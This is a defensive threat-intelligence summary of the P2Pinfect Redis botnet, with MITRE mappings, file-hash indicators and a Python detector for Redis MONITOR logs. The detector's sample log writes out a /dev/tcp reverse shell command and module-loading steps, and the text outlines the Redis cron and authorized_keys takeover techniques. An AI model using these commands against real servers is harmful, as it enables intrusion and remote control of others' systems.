Cado Security Labs Encounter Novel Malware, Redis P2Pinfect

Cado Security Labs describe P2Pinfect, a Rust-based botnet targeting publicly-accessible Redis deployments with cross‑platform Linux and Windows payloads. The malware propagates via Redis replication and module loading, then uses a peer‑to‑peer C2 network, defense‑evading tricks, and persistence mechanisms to sustain and expand the botnet.

Keypoints

  • P2Pinfect targets exposed Redis instances by abusing the replication feature (SLAVEOF) to gain initial access.
  • The malware is written in Rust with both Linux ELF and Windows PE payloads, enabling cross‑platform execution.
  • It loads a malicious Redis module (exp.so) via MODULE LOAD; the module registers a new command (system.exec), which is then used to spawn a reverse shell back to the attacker.
  • According to earlier findings cited in the report, one variant was delivered by exploiting CVE-2022-0543 (a Lua sandbox escape in affected Redis versions); the sample Cado analysed instead obtained initial access through the replication abuse above.
  • P2Pinfect employs multiple persistence and defense-evasion techniques, including SSH backdoor via authorized_keys, .bash_logout persistence, and runtime process monitoring.
  • The botnet uses peer-to-peer communication over HTTPS with a hardcoded certificate, enabling decentralized C2 without a central server.
  • The malware also conducts internet scanning for Redis/SSH, performs worm-like propagation, and can upgrade itself and dormant components (e.g., miner payload).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2022-0543 is cited as the delivery vector for an earlier-reported variant: ‘According to their findings, the variant they encountered was delivered via exploitation of CVE-2022-0543, a LUA sandbox escape vulnerability present in certain versions of Redis.’
  • [T1105] Ingress Tool Transfer – The malware fetches Linux/Windows payloads from an HTTP server after connecting to peers: ‘The binary will reach out to one of these servers to grab a copy of all of the following binaries: Linux – Primary ELF payload for linux systems; Windows Primary PE payload for windows systems; …’
  • [T1046] Network Service Discovery (formerly Network Service Scanning) – Scans the internet for Redis and SSH servers: ‘conduct internet scanning for Redis and SSH servers.’
  • [T1053.003] Scheduled Task/Job: Cron – The Redis cron RCE, i.e. the well-known technique of using CONFIG SET dir and dbfilename to point the RDB dump at a cron spool directory and then issuing SAVE so that a crontab entry embedded in the dump gets executed: ‘P2Pinfect also attempts to compromise the Redis host via the Cron unauthenticated RCE mechanism we’ve previously described.’
  • [T1098.004] Account Manipulation: SSH Authorized Keys – SSH backdoor persistence via authorized_keys: ‘The SSH service is then restarted, and the following key is dropped into the authorized_keys file for the current user.’
  • [T1059.004] Unix Shell – Command execution via system.exec and reverse shell: ‘system.exec is then used to issue a command to the C2 server via a /dev/tcp reverse shell.’
  • [T1071.001] Web Protocols – Botnet coordination over HTTPS with a hardcoded certificate: ‘The HTTPS server uses a hardcoded certificate, which is identical across all botnet members.’
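The Keypoints and MITRE lists above describe one three-step chain against an exposed Redis instance: SLAVEOF/REPLICAOF to an attacker host, MODULE LOAD of exp.so, then system.exec, with CONFIG SET dir/dbfilename as the write primitive behind the cron and authorized_keys tricks. The following is an added example, not code from Cado Security or from the P2Pinfect analysis: detection logic that replays that chain over `redis-cli MONITOR` output (the real MONITOR line format is used), together with the redis.conf directives that remove the abused primitives. The log lines, the client addresses 203.0.113.10 and 10.0.0.5, the ports, and the `requirepass` placeholder are constructed for the example.

```python
"""Replay a redis-cli MONITOR capture and flag the P2Pinfect-style chain.

Added example, not code from Cado Security or from the P2Pinfect sample.
MONITOR line format (real): <unix_ts> [<db> <client_addr>] "CMD" "arg" ...
All log lines, addresses and ports below are constructed for the example.
"""
import re
import shlex
from collections import defaultdict

# One MONITOR line; the client field is ip:port, "lua", or unix:<path>.
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>".*)$'
)

# Constructed sample: one attacker client walking the chain from the report,
# one legitimate client whose SLAVEOF NO ONE must not be flagged.
SAMPLE_MONITOR = """\
1689600001.100000 [0 203.0.113.10:51324] "SLAVEOF" "203.0.113.10" "8888"
1689600002.200000 [0 203.0.113.10:51324] "MODULE" "LOAD" "/tmp/exp.so"
1689600003.300000 [0 203.0.113.10:51324] "system.exec" "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"
1689600004.400000 [0 10.0.0.5:40012] "GET" "session:abc"
1689600005.500000 [0 10.0.0.5:40012] "SLAVEOF" "NO" "ONE"
"""


def parse_monitor_line(line):
    """Return (timestamp, client, argv) or None if the line is not MONITOR output."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return float(m.group("ts")), m.group("client"), shlex.split(m.group("argv"))


def classify(argv):
    """Map one command to a stage of the chain described in the report, or None."""
    if not argv:
        return None
    cmd, args = argv[0].upper(), [a.upper() for a in argv[1:]]
    # Stage 1: replication hijack. SLAVEOF NO ONE is a normal operator action;
    # anything else re-points this instance at a possibly attacker-run master.
    if cmd in ("SLAVEOF", "REPLICAOF") and args[:2] != ["NO", "ONE"]:
        return "replication"
    # Stage 2: attacker-supplied shared object (exp.so in the report) that
    # registers an extra command such as system.exec.
    if cmd == "MODULE" and args[:1] == ["LOAD"]:
        return "module_load"
    # Write primitive behind the cron and authorized_keys tricks: CONFIG SET
    # dir/dbfilename followed by SAVE drops the RDB dump at a chosen path.
    if (cmd == "CONFIG" and len(args) >= 2 and args[0] == "SET"
            and args[1] in ("DIR", "DBFILENAME")):
        return "config_write"
    # Stage 3: execution through the module-injected command.
    if cmd.startswith("SYSTEM."):
        return "exec"
    return None


def detect_chain(lines):
    """Return {client: [stages in order]} for clients that hit two or more stages."""
    seen = defaultdict(list)
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue  # tolerate redis-cli banner lines such as "OK"
        _ts, client, argv = parsed
        stage = classify(argv)
        if stage and stage not in seen[client]:
            seen[client].append(stage)
    return {client: stages for client, stages in seen.items() if len(stages) >= 2}


# redis.conf directives that remove the abused primitives. enable-module-command
# exists from Redis 7.0; rename-command is the fallback on older releases.
HARDENED_REDIS_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass CHANGE-ME-long-random-secret
enable-module-command no
rename-command SLAVEOF ""
rename-command REPLICAOF ""
"""

if __name__ == "__main__":
    for client, chain in detect_chain(SAMPLE_MONITOR.splitlines()).items():
        print(f"ALERT {client}: {' -> '.join(chain)}")
```

MONITOR costs real throughput on a busy instance, so run it for a short window or feed the detector from a command-logging proxy that emits the same format. A single MODULE LOAD from a non-operator address is already worth an alert on its own; the two-stage threshold here only suppresses noise from legitimate failover tooling that issues SLAVEOF. Check whether any client legitimately depends on CONFIG before adding `rename-command CONFIG ""` as well.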

Indicators of Compromise

  • [File] linux – 87a3fc1088449dbd3554fe029a1878a525e64ab4ccf71b23edb03619ba94403a – Primary Linux payload
  • [File] miner – b1fab9d92a29ca7e8c0b0c4c45f759adf69b7387da9aebb1d1e90ea9ab7de76c – Dropped miner payload
  • [File] bash – ce047893ac5bd2100db3448bd62c324e471ffcddd48433788bfe885e5f071a89 – Dropped bash binary used for persistence/monitoring
  • [IP] 0.0.0.0 – Wildcard bind address on which the bot's peer listener accepts connections (an implementation detail rather than a network indicator to hunt for; look for the unexpected listening socket on the host instead)
  • [Domain] ipv4.icanhazip.com – Used by malware to fetch its IP address
  • [URL] /ip – Used by infected nodes to report their local IP during peer registration

Read more: https://www.cadosecurity.com/redis-p2pinfect/